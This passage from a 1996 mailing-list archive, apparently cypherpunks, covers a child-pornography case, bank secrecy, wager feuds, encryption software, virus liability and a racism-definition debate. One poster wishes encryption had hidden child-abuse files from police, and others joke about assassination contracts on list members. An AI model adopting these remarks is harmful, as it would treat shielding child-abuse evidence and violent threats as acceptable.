   Internet user whom Kohl does not know by name.

   Kohl has no criminal record, and because of that the pornography charge
   was filed as a misdemeanor, according to the District Attorney's Office.
   No charges have been filed against Kohl for his possible misuse of
   university funds.

   The police found two computer disks, with approximately 15 files
   containing the sexually explicit, graphic material, said Stanley M.
   Roden, one of Kohl's lawyers.

   [...]

   Roden explained that Kohl had been exploring what are known as chat
   rooms on America Online when he was approached by another user and asked
   if he was interested in seeing unspecified files.

   "David never showed, disseminated, paid for, asked for, or looked at them
   again," said his attorney.

   [...]

   Possession of child pornography locally is an unusual charge according to
   campus and city police and watchdog groups for the Internet and child
   pornography laws.

   "There have been no arrests here for child pornography over the last 10
   years," said Santa Barbara Police Department Lt. Nick Katzenstein.

   The university police department's chief, John L. MacPherson, said he has
   never before had a complaint about child pornography.

I also heard an interview with the lawyer on the radio this morning.  He
claimed that this would be a "test case" because Kohl had only had the
files in the privacy of his own home and never looked at them after
realizing what they were.  "As soon as he needed a disk, that one would
have been erased," he said.

It's too bad Kohl didn't use software which automatically and
transparently encrypts his floppies.  Then they would have tried to
subpoena the key, thinking that the floppies might have incriminating
info related to the embezzling charge, never dreaming that they contained
child porn.  That would have been an interesting case.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 24 Apr 1996 06:16:37 -0700 (PDT)
To: cypherpunks@toad.com
Subject: GIV_way
Message-ID: <199604241316.JAA09448@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   FiTi reports on a Lisbon money laundering conference:

   4-23-96: "Long arm of US law threatens business."

      The extra-territorial reach of US law poses a growing
      threat to non-US companies doing business, even
      indirectly, with that country, an expert on money
      laundering said yesterday. Mr Rowan Bosworth-Davies told
      a conference in Lisbon that US courts had been
      "consistent in concluding that US law enforcement
      interests outweigh a foreign nation's interests in
      preserving the confidentiality of its banking or its
      business records".

   4-24-96: "US prosecutor attacks bank secrecy laws."

      A US federal prosecutor yesterday told banks that they
      are no better than prostitutes if they transmit money
      without knowing their customers or the purpose of the
      transaction. Mr John Moscow said: "The ancient concept
      that bank secrecy must be preserved to keep a
      gentleman's financial affairs confidential -- dating
      back to the days when only gentlemen had cheque
      accounts, and their servants did not -- must give way to
      the current reality.

   GIV_way






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 24 Apr 1996 06:22:42 -0700 (PDT)
To: cypherpunks@toad.com
Subject: SHA_dow
Message-ID: <199604241322.JAA09828@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Three US papers report on hardly any intelligence reforms
   endorsed by Don't Worry, Boys, Clinton in response to the
   ole-boy Brown's CIA-CYA-all-the-way dark shadowisms.

   SHA_dow











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 24 Apr 1996 17:35:23 -0700 (PDT)
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: Re: [NOISE] [Wager: Seeming Resolution]
Message-ID: <m0uC7oO-00092NC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:57 AM 4/24/96 -0400, Declan B. McCullagh wrote:
>Excerpts from internet.cypherpunks: 23-Apr-96 [Wager: Seeming
>Resolution] by Black Unicorn@schloss.li 
>> The only issue is how you wish to modify that claim for the purposes of
>> the wager so as to bring it within a semblence of accuracy.
>>  
>> Absent further interest on your part, I consider the matter closed and 
>> your claim retracted.
>
>I confess I had a good laugh at Jim Bell's expense. His attempt at
>weaseling was sadly uninspired, and Black Unicorn was quite right to
>move in for the kill.
>

What "kill"?  Unicorn claimed a few days ago that he THOUGHT that his 
challenge would never be accepted, ostensibly because of haggling by me.  I 
interpret this as unwillingness to bargain in good faith (sandbagging), 
which is reasonable given Unicorn's track record.  Given this thinly-veiled 
warning of dishonesty, it is only realistic that I would not want to accept 
his challenge.  

Notice that he hasn't presented what he would claim to be the scope of the 
conditions, which suggests that he's going to try to spring them on me 
later.  I, for one, am not going to accept the legal equivalent of a 
witch-doctor's example, and I don't think anyone else here would find that 
to be acceptable either.

Further, all this is merely  an attempt to distract from the issue that I 
raised, one that Unicorn hasn't dared to talk about yet: I claimed that of 
the examples quoted in that SC decision, which were cited as exceptions to 
5th amendment protections in the US, all of them represent examples which 
were only considered technologically useful in the last 100 years, the 
oldest being fingerprinting.  Given this, it is easy to conclude that there 
is no realistic basis for an interpretation that they are genuinely 
exceptions to 5th amendment protections, and were allowed simply because 
they were useful.

Isn't it interesting how Unicorn always seems to dodge the analysis and 
replace it with precedent?

Jim Bell
jimbell@pacifier.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Wed, 24 Apr 1996 06:50:31 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [An End To Noise] Wager: Permanent Resolution
In-Reply-To: <glTPGm200YUu5iTVd2@andrew.cmu.edu>
Message-ID: <Pine.3.89.9604240919.A26145-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 24 Apr 1996, Declan B. McCullagh wrote:

> I confess I had a good laugh at Jim Bell's expense. His attempt at
> weaseling was sadly uninspired, and Black Unicorn was quite right to
> move in for the kill.
  ^^^^^^^^^^^^^^^^^^^^

   Is it possible that we are witnessing a self-fulfilling prophecy?
I believe that we are contributing to the gradual implementation of Jim's AP
system to deal with excessive noise posting (which makes AP to be The 
Assassination Posting) and unenforceable betting. It's interesting to note 
that this is the side-effect of Mr. Bell's own postings on the subject 
(congrats).

   I therefore bet 100 Monopoly Roubles that by the end of the "Unibell" 
dispute (sometime before all the stars freeze over) a contract on the 
original assassination politician's head(s) will have been successfully 
carried out. I also note that Mr. Unicorn, being wealthy and having wisely
protected his anonymity is in a fine position to carry this out. without 
any fear of retaliation or discovery. 

   What's more, during the "No matter where you go, there they are" thread, 
Jim sent a reply to Dr. Denning with the infamous cypherpunks@toad.com in 
the headers. Not smart. Alas, from now on, no matter where Jim goes, Dorothy 
will know. (Say, don't Uni and Denning both live around DC? Hmmm...)

   So I submit to the list that any reinvention of the AP is ultimately 
self-terminating. (Though it might reduce noise and deal with unsuscrivers)

The odds aren't good, Jim. You should have been more careful.

;-)

> But to be fair to Jim Bell, perhaps $100 is still too high? I mean this
> in complete seriousness: I have to come up with nearly $2,000 cash by
> this weekend, and I wouldn't be able to make such a wager at this time,
> no matter how right I felt I was.

Watch out Declan, the frustrated gamblers on the list might take your 
statements as encouragement to Jim and decide to test out the prototype 
AP on you first. )8-0


Be careful folks, Little Dorothy is watching You!


Ps. As this pseudonym will disappear before September, I am quite safe, 
myself.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 24 Apr 1996 14:41:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: GIV_way
In-Reply-To: <199604241316.JAA09448@pipe4.nyc.pipeline.com>
Message-ID: <Pine.GUL.3.93.960424095109.19618B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Apr 1996, John Young wrote:

>    4-24-96: "US prosecutor attacks bank secrecy laws."
> 
>       A US federal prosecutor yesterday told banks that they
>       are no better than prostitutes if they transmit money
>       without knowing their customers or the purpose of the
>       transaction.

I agree with this completely. I'm sure that I disagree with said US
prosecutor on the criminalization of sexual entrepreneurship (tm), though,
so our agreement is meaningless.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Wed, 24 Apr 1996 07:00:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: your spam
In-Reply-To: <1002C5F271A@cs_fs15.csd.plym.ac.uk>
Message-ID: <Pine.3.89.9604240938.B26145-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 24 Apr 1996, Jason Roissetter wrote:

> UNSUBSCRIVE

Which means that Jason Roissetter might soon be dead. ;-)
Is anyone keeping lists?

One must note that capital punishment is an excellent means of 
unsuvscription.



(Ps. Just joking, Jason or whoever you are.)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 24 Apr 1996 14:41:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Meta: The Arguing about the Terms of the Wager Continues
Message-ID: <ada3a446010210045243@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:07 PM 4/24/96, jamesd@echeque.com wrote:
>At 11:45 PM 4/23/96 -0700, Timothy C. May wrote:
>> And so the back-and-forth continues...taking up even more list space
>> arguing, waffling, finessing, rebutting, disputing, and on an on.
>>
>> Exactly as several of us have predicted.
>
>True, but one should note that it is Jim Bell that is weaseling,
>and that Unicorn is not weaseling.

It doesn't matter too much who's mainly to blame--the result is the same.

And game-theory-wise, there is little incentive to quickly push the wager
to a well-defined final state. These "bets" are largely tail-feather
displays, anyway, so the posturing and weaseling serves the purpose of one
or more of the parties. Which is precisely why these bets take up so much
list bandwidth.

On the Extropians list, during the last few months I was on it, a huge
fraction of the list traffic was devoted to such arguments (along with
"pending court cases" involving one party filing charges against another,
searches for mediators, countersuits, judgments, arguments about
punishments, and on and on).

Frankly, I thought that Black Unicorn claimed to have seen the error of his
ways (in terms of debating with Bell) and was going to stop?

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 24 Apr 1996 14:41:50 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Kill Files
Message-ID: <ada3a7bf02021004232e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:04 PM 4/24/96, s1113645@tesla.cc.uottawa.ca wrote:

>One must note that capital punishment is an excellent means of
>unsuvscription.
>
>
>(Ps. Just joking, Jason or whoever you are.)

On a serious note, I hereby predict that the term "kill file" will soon be
picked up by the clueless media and/or Congress as a sign that the Internet
is dangerous. (I'm sure it already has been used as a negative, but I'm
predicting a more visible focus on this term, however briefly. To the
average American, it conjures up images closely related to Jim Bell's
ideas!)

I had one of our "unsubscrive" newbies asking me what I meant by "putting
him in my kill file," and saying he was planning to let his site manager
know about "your threat."

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 24 Apr 1996 07:29:16 -0700 (PDT)
To: philip@cs.brandeis.edu (Philip Trauring)
Subject: Re: What's the best Mac crypto program?
In-Reply-To: <v03006601ada3670bb3a8@[129.64.2.182]>
Message-ID: <199604241533.KAA00162@homeport.org>
MIME-Version: 1.0
Content-Type: text


I use Cryptdisk.  I suspect its better than any of the ones you pay
for.  Most of them try to do too much, and thus probably fail.  Also,
most of them are no marked 'Export Controlled,' which incidates a
scary lack of knowledge on the part of the companies.


Bruce Schneier wrote 'Protect Your Macintosh.'
http://www.peachpit.com/peachpit/titles/catalog/48436.html

Adam


Philip Trauring wrote:
| 
| 
| What is the best free/shareware program for protecting(and I mean
| government-strength encryption) a Mac folder or creating a protected Mac
| volume?
| 
| Additionally, are any of the commercial products available safer than these
| free/shareware ones?
| 
| Thanks,
| 	Philip
| 
|           --=--=====--=--=====--=--=====--=--=====--=--=====--=--
|                    Philip Trauring      philip@cs.brandeis.edu     617-736-6702
|                          "knowledge is my addiction, information is my drug"
|                                         http://www.cs.brandeis.edu/~philip/
|           --=--=====--=--=====--=--=====--=--=====--=--=====--=--
| 
| 
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Wed, 24 Apr 1996 14:37:52 -0700 (PDT)
To: wb8foz@nrk.com
Subject: Re: EYE_suk
In-Reply-To: <199604240503.BAA04064@nrk.com>
Message-ID: <pKnfx8m9LANQ085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199604240503.BAA04064@nrk.com>,
David Lesher <wb8foz@nrk.com> wrote:

> (BTW, it's worth wondering what restrictions there'd be if it were
> not for an ENORMOUS turf battle between them & Jill Edgar Hoover.)

Or, if Hoover had won that battle and acquired control of foreign 
intelligence, just how much more like Lavrenti Berya he would have 
become.

- -- 
Alan Bostick               | They say in online country there is no middle way
mailto:abostick@netcom.com | You'll either be a Usenet man or a thug for the CDA
news:alt.grelb             |    Simon Spero (after Tom Glazer)
http://www.alumni.caltech.edu/~abostick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMX5zjuVevBgtmhnpAQE13wL+Lsh+r1qZut8Ohb9q5nO2KfK9/S2+zcih
vZeztr17+zKpvAyde8IV7gKvqxNWHS661bVmRqgXn7dhOdFFRnxFVeqZkJIEPx/H
xjDTFz6gCIqM+l5HDJ2uZwr8m1eEhvU+
=rdPr
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 24 Apr 1996 08:39:52 -0700 (PDT)
To: wombat@mcfeely.bsfs.org
Subject: Re: [NOISE] Re: Nazis on the Net
Message-ID: <01I3X2F0KXIO8Y50EU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"wombat@mcfeely.bsfs.org"  "Rabid Wombat" 23-APR-1996 21:57:59.91

>I'm typing green letters on a black background. All you people with black 
>characters on a white background should go talk on another 'net.

     I never said I approved of separatism; I just consider it slightly less
evil than racism. It's sort of like the distinction between Chinese censorship
of the Net and American (attempted) censorship of the net - both are evil, the
American one is just less so because it doesn't go as far. The distinction
between racism and separatism isn't as great, admittedly.
     -Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 24 Apr 1996 14:38:32 -0700 (PDT)
To: sameer@c2.org
Subject: Re: Golden Key Campaign
In-Reply-To: <199604241540.IAA03214@atropos.c2.org>
Message-ID: <317E73AD.2362@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer@c2.org wrote:
> 
> >   The key at the bottom of the Netscape window is not the RSA logo, and
> > doesn't even look much like it.  Our key is meant to convey the
> > absence or presence of encryption via a metaphor that is understandable
> > to the average home user, not as an advertisement for RSA.
> 
>         The RSA key *does* appear on the flash screen though,
> remember.

  Yes, this screen does appear on startup on the unix version, but
on Mac and Windows (90% of installations) it only appears when you
select "About Netscape" from the "Help" menu.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 24 Apr 1996 08:49:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Majordomo patch will be available
Message-ID: <01I3X2UUSU5I8Y50EU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


Here's the information on the majordomo patch to do the confirmation:

>Allen, the patch to do this that you asked about is gonna be distributed as
>part of the new majordomo beta, and will be freely available.

       -Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 24 Apr 1996 14:41:57 -0700 (PDT)
To: Black Unicorn <unicorn@schloss.li>
Subject: [NOISE] Reasonable people
In-Reply-To: <Pine.SUN.3.93.960423183933.10274D-100000@polaris.mindport.net>
Message-ID: <199604241648.MAA05361@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn writes:
>On Tue, 23 Apr 1996, Scott Brickner wrote:
>> O.W. Holmes suggested out in "The Common Law" that the law delineates a
>> certain minimum level of competence in forseeing the outcomes of our
>> actions which all members of society are expected to attain.  We'll
>> hold you responsible for actions a "reasonable person" should have
>> avoided because of their danger.
>
>With you so far.  (Though Holmes is by no means the litmus by which
>today's legal world tests its process).

I know.  I've no formal legal training, and picked up "The Common Law"
to try to get an understaning of "lawyer-think", not to learn the law.
You use what you know, though.

>> As such, persons with limited
>> training in manipulating biological viruses are expected to avoid doing
>> so.  Individuals *with* training are expected to take adequate
>> precautions to avoid their spread.  I see no reason why electronic
>> viruses shouldn't be treated similarly.  If you're going to write them,
>> you *better* take steps to prevent their release, or you are liable for
>> the damages.
>
>Now you jumped the argument a bit.  There is a difference in holding
>someone to a reasonable standard generally, and defining several standards
>based on the experience of the person to which the standard is being
>applied.

I'd argue that I'm holding everyone to the same standard:  either know
the safe ways of handling viruses and follow them, or don't handle them
at all.  You seem to imply that I'd hold the untrained virus writer
harmless.  No way.  He's reckless and *should* be liable.  When one has
training, it's no longer reckless to simply handle (or write) the
virus, but disregarding safe procedures is negligent.

>This latter approach is often called (jokingly by some) the Objective
>Subjective Standard.  (Objective standard being without consideration of
>the view of the individual being judged, subjective including that view,
>and object subjective being the consideration of what the general class of
>individual would do without consideration of the individual's specific
>view).
>
>(What would a reasonable virus writer do is distinct from what a
>reasonable Bob Dwyer, Ph.D. Computer science might do is distinct from
>what a reasonable person might do).
>
>Many courts reject higher (or lower- there are arguments for this 
>too) standards of care for experts than for lay persons or other
>non-experts in tort cases, prefering to impose the "reasonable person"
>(Reasonable man for those of you who went to law school before 1985)
>standard universially.

I assume that a canonical example of the lower-standard case is the
"Good Samaritan" laws which reduce the liability of a trained person
performing rescue activities (e.g., administering CPR).

It seems to me that the "reasonable person" isn't the real issue
there.  Someone with training ought to be expected to do the "right"
thing.  If you're trained to administer CPR, and you do it *wrong*, you
shouldn't be absolved of liability -- you're negligent.  If you don't
know anything about CPR (except what you've seen on "Baywatch"), then
we're back to what a "reasonable person" should do.  If you're trained
and you do it right, but the person is still injured by your actions,
limiting your liability is society's way of encouraging you to use
your training for the common good.

In my mind, the difference between the objective standard and the
subjective one marks the difference between recklessness and
negligence.  If an objective "reasonable person" wouldn't do it, it's
reckless.  If a subjective "reasonable person" wouldn't, it's
negligent.

Perhaps these aren't the "legalese" usages of the terms, but it seems
reasonable to me.

>If there is interest, I will post exerpts of the arguments on both sides
>of this issue with the header [Noise].

I'd be interested.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Wed, 24 Apr 1996 14:37:57 -0700 (PDT)
To: tcmay@got.net
Subject: Re: "You have been deleted"
In-Reply-To: <ada2fe6f030210045e74@[205.199.118.202]>
Message-ID: <Gvnfx8m9LAUU085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <ada2fe6f030210045e74@[205.199.118.202]>,
tcmay@got.net (Timothy C. May) wrote:

> Theory 1:
> 
> While working through the examples for Day Eight of "Teach Yourself Java
> for Macintosh in 21 Days," I accidentally created a rogue applet which
> enabled a virus developed in Bulgaria to enter my system. From there, it
> infected several other computer systems, including a Sony PlayStation, a
> Foonley, and several Exidy Sorcerers. Service to Northern California is
> only now being restored.
> 
> Theory 2:
> 
> The Men in Black finally had enough, especially of my theft of their domain
> name (Blacknet). At 9:09 a.m., PDT, Clinton's black helicopter detoured on
> its route and landed on my hill, abducting me for medical experiments I am
> too embarrassed to describe (except that Chelsea was also involved). I am
> back now, albeit subtly changed (for the better).
> 
> Theory 3:
> 
> My ISP, got.net, had a router failure on its "ZNEt" link to the outside world.
> 
> 
> 
> Take your pick. Or maybe we should vote? The social construction of
> reality, and all.
> 
> Alas, sometimes the truth is too banal.

It's a clever piece of misdirection, "Tim", but it just won't work.

You know as well as I that that was no router failure at all, but an 
unavoidable side-effect of putting the man-in-the-middle connection that
directs all electronic communications to or from the real Tim May through
the Blue Cube at Onizuka Air Force Base.

Poor Tim - getting a sanitized, innocuous Internet feed.  Possibly none
the wiser for it.

I bet you're having fun, whoever you are, with the chance to make a
monkey out of Tim.  But we're on to you, and it's only a matter of time
before Tim is, too.

- -- 
Alan Bostick               | They say in online country there is no middle way
mailto:abostick@netcom.com | You'll either be a Usenet man or a thug for the CDA
news:alt.grelb             |    Simon Spero (after Tom Glazer)
http://www.alumni.caltech.edu/~abostick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMX5/neVevBgtmhnpAQE8cAMAutAs59yLLJDj7Z7FDc4j2kZzky5GgmdV
0A2m+FTyhSgdj5ZydHqh4Dp2JteMBOibjIT5LJbOKRF4QAGneHJcLPKp84CNST5m
ucVuHpa5Wq22jGul4rUYoAIoeLqhu0LN
=HWUG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 24 Apr 1996 09:07:50 -0700 (PDT)
To: cypherpunks@toad.com (Cypherpunks)
Subject: crypto in .ja (fwd)
Message-ID: <199604241607.MAA06196@nrk.com>
MIME-Version: 1.0
Content-Type: text


Forwarded message:

X-URL: http://www.us.net/~steptoe/276915.htm
 
> Emerging Japanese Encryption Policy
> 
> By Stewart A. Baker 
{}
> Summary: The emerging Japanese consensus on cryptography

This is worth reading for what it says about the US policy,
if indirectly.

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 24 Apr 1996 09:11:37 -0700 (PDT)
To: tallpaul@pipeline.com
Subject: Re: "Separate but equal" as a racist doctrine
Message-ID: <01I3X3T0O8408Y50EU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tallpaul@pipeline.com" 24-APR-1996 03:36:53.30

>For some considerable period of time the doctrine of "separate but equal"
>was one of the major racist theories in the U.S. 

      I am quite aware of this; I grew up in the South. In practice, it
wasn't seperate but equal; it was separate but unequal. This was the intent of
the persons pushing it, which made them racist. (They are also justifiably
classified as racist on many other grounds).
 
>People who wish to organize for racist ideology behind this doctrine while
>proclaiming they are not racists merely place themselves in the old racist
>camp. Their organizing for (and their denials of) racist ideology does not
>make them less racist, just less honest. 
 
      Persons who wish to organize for _racist_ ideology, yes. But assuming
that every separatist is actually a racist is about like assuming that everyone
on this list is an anarcho-capitalist; while correct in the majority of cases,
it isn't correct in all. (You and I are both exceptions, for instance.)
      -Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 24 Apr 1996 14:42:07 -0700 (PDT)
To: bryce@digicash.com
Subject: Re: [NOISE] Re: Nazis on the Net
Message-ID: <01I3X4HW9GTI8Y50EU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"bryce@digicash.com" 24-APR-1996 06:43:13.96

>For what it's worth, Webster's defines:

>rac.ism \'ra--.siz-*m\ \-s*st\ n 1: a belief that race is 
>  the primary determinant of human traits and capacities and
>  that racial differences produce an inherent superiority of 
>  a particular race 2: RACIALISM - rac.ist n 

[...]

>Thus no two of "racists", "separatists" and "race-haters"
>would be identical sets of people.

?

>But with a high degree of overlap, I'd warrant.

     Fully agreed. I don't dispute that most people calling themselves
separatists are racists; it's just that I'd prefer not to call someone a racist
who isn't one.... just as I'd prefer not to call a liberal a Communist unless
they are one. (Communist referring to the whole dictatorship of the proletariat
business, not just state socialism - the former, which is not classical
Marxism, is where the abuses of rights other than private property come in).

>This means that Abraham Lincoln was a racist, by the way.

     Abraham Lincoln is one reason I _don't_ use the above definition; by mine,
he'd be a separatist (wanted to move Blacks to Liberia, if I recall correctly).
I trust that everyone involved in this discussion (with the exception of the
neo-Nazi) would agree that Abraham Lincoln was better than those in the South
who wanted to keep blacks enslaved?

>(That definition isn't too good, though.  "_The_ primary 
>determinant"?  I would have to classify as racist those who
>believe that race is _a_ primary determinant of those
>qualities.)

     The definition is bad enough that I checked a concise OED for comparison;
see the results and my commentary below.

>Sorry to be off-topic, but if a thing is going to be
>discussed I might as well try to add signal.  (The "[NOISE]"
>tag that I left in the subject line doesn't indicate noise,
>but off-topicness.)  Perhaps we could just drop the 
>"Cc: cypherpunks" part and continue this discussion?

     Thank you. The dropping of the cc:cypherpunks part would be rather
inconvenient. This phenomenon is one reason that I'd like to see a list
server capable of setting up mini-lists on demand, easily.

>Concise Oxford Dictionary, 8th Ed., Copyright 1991 Oxford Univ. Press

>/racism/ <<"reIsIz(@)m>> n.
>1.
>   a. a belief in the superiority of a particular race; prejudice based on
>      this.
>   b. antagonism towards other races, esp. as a result of this.
>2. the theory that human abilities etc. are determined by race.

     This has some differences from the Webster definition, specifically the
inclusion of prejudice as a definer. The latter definition is silly. It is
scientifically well-proven that different races have different physical
attributes - blacks tend to have higher blood pressures, for instance. Is this
definition saying that believing what is known is racism?
     Of course, with this definition I can see why Herrnstein and Murray keep
being called racists. (Incidentally, I don't believe they are correct regarding
the genetic component of intelligence as having a racial correlation - the
existing (and unfortunate) environmental differences are a perfectly adequate
explanation. Unfortunately, we can't tell the existence or non-existence of
such differences until the genes affecting intelligence are significantly
better understood; until then, the most pragmatic assumption is the lack of
any such difference, given the lack of any obvious evolutionary cause for it.
In other words, I call _The Bell Curve_ mistaken in its conclusions on race -
not racist. Incindentally, I also believe that such differences are
environmental for the emotional reason that I would be very uncomfortable
believing otherwise. I don't think this is biasing my evaluation of the
science, however.)

Both of these definitions involve "superior" and "superiority"; I thus also
looked this up.

>/superior/ <<su:"pI@rI@(r)>>, <<sju:->>, <<sU->> adj. & n.

>adj.
>1. in a higher position; of higher rank ("a superior officer"; "a superior
>   court").
>2.
>   a. above the average in quality etc. ("made of superior leather").
>   b. having or showing a high opinion of oneself; supercilious ("had a
>      superior air").
>3. (often foll. by "to")
>   a. better or greater in some respect ("superior to its rivals in speed").
>   b. above yielding, making concessions, paying attention, etc. ("is
>      superior to bribery"; "superior to temptation").

      I don't think anyone would disagree that blacks are currently (and
unfortunately) in a lower position in US society overall. Moreover, the 2nd
and 3rd part of the definition make "racism" as defined above a rather
over-inclusive term. For instance, it would call any scientist who does a
study and finds lower IQs among members of some race a racist. Such differences
are well-known to exist, and (as I state above) are probably environmental
in origin.
      In other words, unless one makes the "prejudice" and/or "antagonism"
parts mandatory (in which case it would be narrower than my definition of
racist, which essentially hinges on definite prejudice existing), the Webster
definition of racism is over-inclusive by any reasonable standard.
      -Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 24 Apr 1996 14:41:50 -0700 (PDT)
To: tallpaul@pipeline.com
Subject: Re: Nazis on the Net
Message-ID: <01I3X4VRLZJ08Y50EU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tallpaul@pipeline.com" 24-APR-1996 00:24:46.89

>> It would 
>>have been better if the atomic bomb had been ready in time to use against 
>>Germany and Stalinist Russia. 

>It was ready "in time" to use against "Stalinist Russia" (which, BTW, was
>Stalinist "Soviet Union,"). 

     It was not ready to use against the USSR/Russia (as should probably be
evident from current nationalist movements in the non-Russian portions of the
USSR, Russia tended to dominate that union) before the USSR was an ally of the
United States. (I refer you to the Molotov-Ribbentrop pact between the USSR and
Nazi Germany.) After the war, they were still tied by various agreements; by
the time that it became obvious that Russia had broken those agreements, it
had nuclear weapons and an attack would have been suicidal.
     -Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Wed, 24 Apr 1996 03:44:55 -0700 (PDT)
To: jamesd@echeque.com
Subject: [NOISE] Re: Nazis on the Net
In-Reply-To: <199604240516.WAA10983@dns1.noc.best.net>
Message-ID: <199604241043.MAA26907@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

For what it's worth, Webster's defines:

rac.ism \'ra--.siz-*m\ \-s*st\ n 1: a belief that race is 
  the primary determinant of human traits and capacities and
  that racial differences produce an inherent superiority of 
  a particular race 2: RACIALISM - rac.ist n 


"http://c.gp.cs.cmu.edu:5103/prog/webster"


Thus no two of "racists", "separatists" and "race-haters"
would be identical sets of people.


But with a high degree of overlap, I'd warrant.


This means that Abraham Lincoln was a racist, by the way.


(That definition isn't too good, though.  "_The_ primary 
determinant"?  I would have to classify as racist those who
believe that race is _a_ primary determinant of those
qualities.)


Sorry to be off-topic, but if a thing is going to be
discussed I might as well try to add signal.  (The "[NOISE]"
tag that I left in the subject line doesn't indicate noise,
